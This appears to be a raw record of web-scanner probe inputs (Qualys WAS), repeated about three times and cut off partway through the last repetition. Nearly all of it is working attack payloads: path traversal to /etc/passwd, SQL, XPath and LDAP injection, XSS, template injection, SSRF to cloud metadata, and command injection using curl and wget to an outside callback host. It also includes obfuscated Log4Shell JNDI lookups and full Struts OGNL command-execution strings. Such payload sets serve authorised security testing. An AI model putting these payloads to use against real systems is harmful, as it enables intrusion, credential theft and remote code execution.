//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
;--
1
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qss9Dh6APT2=7< /script>
1
" onEvent=X156889004Y1_2Z
1
' onEvent=X156889004Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss9CmgSPS7=7")}
1
1">
1
1
"'>
1
1
1
1
1
1 _q_q=random(2c2J24dh)
1
_q=random(X156889004Y1_2Z)
1
_q=random(X156889004Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X156889004Y1_2Z);
1
" onEvent=X156889004Y1_2Z
1
' onEvent=X156889004Y1_2Z
1
_q=random(X156889004Y1_2Z)
1
"'>
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
|ping -c2 -i91 localhost|
1
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl d4051526475c1038056ec1906cc60e41a7d30f15.17194012393642422.3166406872.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget f4df77d22e0bfefd836affc051c1be81270ace96.17194012393642422.4221361254.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
__import__('os').popen('curl 5ecde5800ad755a5ae03cbe035c61e182adc2904.17194012393642422.1914302541.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
1
@pd.core.frame.com.builtins.__import__("os").system("""curl ed81d2f15bca4ae5fe36f9f0c94df96cf0e03e14.17194012393642422.644796842.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl e67852702a686781ade57ff65169c22eae6bb3ed.17194012393642422.1817911965.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","3485472c143521a63967049be5d7a5974a1382ba.17194012393642422.4244793798.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://3b92592a7f54dcea0ce8c788756a5bbabb60f258.17194012393642422.1569798264.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://9ba05dcb88be5d6640c6314bd4e7af42b99712bf.17194012393642422.2189793580.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//c559107945553f7b8390aa59c935ffc88adfeec9.17194012393642422.1430901757.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://e4b7156f9b10ed20c6a7fe90bbda6727a98e9658.17194012393642422.619347574.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//2987df65eeaa00f6b69d2b177c1bb822cd7f8598.17194012393642422.390366377.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://a96f609941670d2c3c0967d8f94242b75b6fed95.17194012393642422.3795652625.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//955e90a8fa56f340bd302c6ff42315e38bc47426.17194012393642422.1261707660.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://1151c64c518f4d2a43136cba1fec1d12b392faf2.17194012393642422.998535730.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://b5048eca15e86a0ad1443f70bf16f3f8f89f9ea8.17194012393642422.3367390884.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://1be65c72f51626889e847111c54cffac6012dff9.17194012393642422.3413613531.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://8f88c79fac130c2d7a35f4ed9de7284fd889110f.17194012393642422.744823842.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
91e0edcf82b5b53cbfba5af369832d94c1ac0a19.17194012393642422.3581447305.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://82438c6c960e9acf12ae1e397b53018d7245091f.17194012393642422.2052125527.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@dd6c6f5822e9898c7e750a77d5dc54e28fdc58e1.17194012393642422.2481529712.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssLyzx346i};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssNMZV20h4()-"
1
'-qxss2Z36C5u1()-'
1
*/;(function(){qxssk97N1P50});/*
1
9 ;(function(){qxss73EbQiIT});//
1
9;(function(){qxsswG6aRxv3});//
';(function(){qxss69EYDXy2});/**/'
1
1
qualys(aqxssGSR12uWT)xyz
1
");(function(){qxssao31bLn1});/**/"
1
";(function(){qxssceN6wa0B});/**/"
1
javascript:qxss(X2983617084Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssG6h81M4m=7< /script>
1
" onEvent=X2983617084Y1_2Z
1
' onEvent=X2983617084Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qsscL2KS28O=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(0nlP357W)
_q=random(X2983617084Y1_2Z)
1
1
_q=random(X2983617084Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2983617084Y1_2Z);
1
" onEvent=X2983617084Y1_2Z
1
' onEvent=X2983617084Y1_2Z
1
_q=random(X2983617084Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1'; var djci=sleep(29*1000) + '
1
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl fb886afdb85f2c8022380b45df0ff4f8d5332049.17159034393642422.173967017.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 41054ef03bcaf0fed35a06197195334644d0f4c6.17159034393642422.2870522527.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl bd10ae7757f71ff3aecfba39d043c53b323c9fdf.17159034393642422.2316789591.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 586b8b1b26dd03219784cb1ae40edd97080b0808.17159034393642422.3570590177.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 453330dc87c44f24a8b8ae7878bc187af5977b06.17159034393642422.1738630105.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","0e3aa2a5781de43a990ced13817e0e9c8e0ed1f8.17159034393642422.2044554206.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c85c32428a50b805b151c569e9cef1012b8eb567.17159034393642422.153248867.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://75a60f6b2571f85e921509911247ed7ce70e09a8.17159034393642422.2997359320.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//a702d263f8d19ab3a48bfcea32dddaa38bc3bbbc.17159034393642422.3381900765.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://4d4fd9cac739d72be0e0fd81cdc586f7d27fd22c.17159034393642422.2826413259.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//d0bf3c14fa03d3e36c271078446655363f0e8c33.17159034393642422.1784557147.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://514c92ef22822629daeada44bf02723811c3ade9.17159034393642422.247498275.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//b139a729a6bde294192897f6a76bdbeb0c861e9a.17159034393642422.2400012625.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://b388a7d504376da83b3ea5a2f925f59b9b30f61a.17159034393642422.988970476.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://0e0f8dc8f4bf949b5cafad128a14a1419a4b8aa0.17159034393642422.460468098.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://a3574400d229275df85915d139094fcf70d57ad0.17159034393642422.3867408802.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://6275d5e8233c5ed7de3b5fb0b75f6cd59ae17814.17159034393642422.306318180.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
f794ce9cceb5fe40496f3841eea6a4a4971a9832.17159034393642422.3918951349.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://0de58956105466be841b74159430050ae751fb29.17159034393642422.1979801278.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@e4d7bb0f968ea215ebf5e6e40fa927b3a21f1d94.17159034393642422.2693449379.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1*(|(objectclass=*))
1
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxssDb2e2FWc};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssX2J13Y07()-"
1
'-qxss4PLXLZ16()-'
1
*/;(function(){qxss9qPSbr98});/*
1
9 ;(function(){qxss62jn00b3});//
1
9;(function(){qxssbw8jzSyA});//
1
';(function(){qxss00ZH54DW});/**/'
1
qualys(aqxssoAaMGG13)xyz
1
");(function(){qxsszbe5Gu0I});/**/"
1
";(function(){qxssc3PD6P2H});/**/"
1
javascript:qxss(X176431492Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssV53Lh01g=7< /script>
1
" onEvent=X176431492Y1_2Z
1
' onEvent=X176431492Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qsse10GKbvz=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(YV643zh6)
1
_q=random(X176431492Y1_2Z)
1
_q=random(X176431492Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X176431492Y1_2Z);
1
" onEvent=X176431492Y1_2Z
1
' onEvent=X176431492Y1_2Z
1
_q=random(X176431492Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 203eac47bad48148bdc0bd0b5c5963674bf51a41.17026060393642422.3875739443.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 7d3c81c5fe70828527d750abe3b803acb5ba84c1.17026060393642422.917627621.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 9c8eea81137b855cb59010df81d686060d1d4eb9.17026060393642422.250789272.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 83c5d7ef8f33ddd02864068fa3effdd4da56bcbc.17026060393642422.699159916.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
